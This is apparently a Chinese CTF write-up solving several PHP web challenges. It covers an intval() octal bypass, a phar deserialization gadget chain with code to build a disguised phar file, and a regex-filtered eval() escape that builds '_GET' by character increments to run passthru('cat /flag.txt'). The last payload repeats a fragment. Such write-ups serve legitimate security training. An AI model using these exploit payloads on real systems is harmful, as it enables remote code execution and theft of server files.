热身
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:53:59 # @link: https://ctfer.com */ include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num, "0")){ die("no no no!!!"); } if(intval($num,0)===4476){ echo $flag; } }
查官方文档
intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 PHP 4, PHP 5, PHP 7 语法 int intval ( mixed $var [, int $base = 10 ] ) 参数说明: $var:要转换成 integer 的数量值。 $base:转化所使用的进制。 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则, 如果字符串以 "0" 开始,使用 8 进制(octal);否则, 将使用 10 进制 (decimal)。
?num=+010574
ATTup
查看前端源码查到php文件
upload.php find.php
任意文件读取漏洞,读取find.php
<!--class View { public $fn; public function __invoke(){ $text = base64_encode(file_get_contents($this->fn)); echo "<script>alert('".$text."');self.location=document.referrer;</script>"; } } class Fun{ public $fun = ":)"; public function __toString(){ $fuc = $this->fun; $fuc(); return "<script>alert('Be a happy string~');self.location=document.referrer;</script>"; } public function __destruct() { echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>"; } } $filename = $_POST["file"]; $stat = @stat($filename);-->
代码审计
stat
stat (PHP 4, PHP 5, PHP 7, PHP 8) stat — 给出文件的信息 这里可以触发phar反序列化
phar反序列化
<?php class View { public $fn; public function __invoke(){ // $text = base64_encode(file_get_contents($this->fn)); // echo "<script>alert('".$text."');self.location=document.referrer;</script>"; } } class Fun{ public $fun = ":)"; public function __toString(){ $fuc = $this->fun; $fuc(); return "1"; // return "<script>alert('Be a happy string~');self.location=document.referrer;</script>"; } public function __destruct() { // echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>"; } } $a=new Fun(); $a->fun=new Fun(); $a->fun->fun=new View(); $a->fun->fun->fn="/flag"; @unlink("phar.phar"); $phar = new Phar("c2.phar"); $phar->startBuffering(); $phar->setStub('GIF89a'.' __HALT_COMPILER();'); //设置stub $phar->setMetadata($a); //将自定义meta-data存入manifest $phar->addFromString("test.txt", "test"); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering();
直接修改后缀为tar
$phar->setStub这行的内容不能出现<?与php,否则会提示内容非法stub的基本结构:
,stub必须以__HALT_COMPILER();`来作为结束部分,否则Phar拓展将不会识别该文件。
然后以phar://c2.tar协议访问即可
alert('Y3Rmc2hvd3szOWFmNDIzMi04MTQ2LTRiMzQtOGUwZS1lYmFiMGExZjY5N2R9Cg=='); 解码得到flag
shellme
直接搜索flag得到flag,非预期解?
shellme_Revenge
尝试搜索ctfhsow,flag,ctf,hint等关键词,查看cookie等信息
Set-Cookie hint=%3Flooklook; expires=Sat, 20-May-2023 04:56:12 GMT; Max-Age=3600 PHP Version 7.2.34
?looklook=1 <?php error_reporting(0); if ($_GET['looklook']){ highlight_file(__FILE__); }else{ setcookie("hint", "?looklook", time()+3600); } if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf_show']; if (is_string($ctfshow) || strlen($ctfshow) <= 107) { if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/",$ctfshow)){ eval($ctfshow); }else{ echo("fucccc hacker!!"); } } } else { phpinfo(); } ?>
生成ascii对应可见字符
with open("ascii.txt","w") as f: for i in range(31,128): f.writelines(chr(i)+"\n")
查看通过正则的内容
<?php $myfile = fopen("ascii.txt", "r") or die("Unable to open file!"); while (!feof($myfile)) { $ctfshow=fgets($myfile); if (is_string($ctfshow) || strlen($ctfshow) <= 107) { if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/", $ctfshow)) { echo "$ctfshow"; } } } fclose($myfile);
第一行是空格
$ ( ) + , - . / 0 1 2 3 ; < = ? C [ ] _ { }
这里尝试通过++和c构造任意字符执行命令
在PHP中,如果强制连接数组和字符串的话,数组将被转换成字符串,其值为
Array
<?php $_=C; $_++; //D $C=++$_; //E $_++; //F $C_=++$_; //G $_=(C/C.C)[0]; //N $_++; //O $_++; //P $_++; //Q $_++; //R $_++; //S $_=_.$C_.$C.++$_; //_GET $$_[1]($$_[2]); //$_GET[1]($_GET[2]) ?> ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;$$_[1]($$_[2]); ctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b
?1=passthru&2=cat /flag.txt ctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b %3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b
